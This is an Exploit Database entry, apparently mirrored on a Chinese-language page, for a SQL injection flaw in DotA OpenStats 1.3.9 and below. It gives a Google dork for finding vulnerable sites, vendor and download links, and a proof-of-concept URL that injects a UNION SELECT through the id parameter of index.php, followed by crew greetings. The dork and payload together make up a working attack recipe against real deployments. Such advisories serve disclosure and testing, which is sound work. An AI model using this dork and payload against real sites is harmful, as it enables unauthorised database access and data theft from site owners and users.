DotA OpenStats 1.3.9 – SQL Injection

• Exploit Database
• 21 阅读

• 作者： HvM17
  日期： 2011-12-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18250/

• =============
  # Exploit Title: DotA OpenStats SQL Injection Vulnerability
  # Google Dork: "© 2011 Powered by DotA OpenStats"
  # Date: 19/12/2011
  # Author: HvM17
  # Version: 1.3.9 and below
  # Tested on: WinXP
  
  =============
  # VenDor : http://openstats.iz.rs/
  # Download script: https://sourceforge.net/projects/dotaopenstats/
  =============
  
  [~] Exploit
  		
  		http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4
  		
  ============
  Made IN INDONESIA
  Greetz for All HVM crew :)
  ============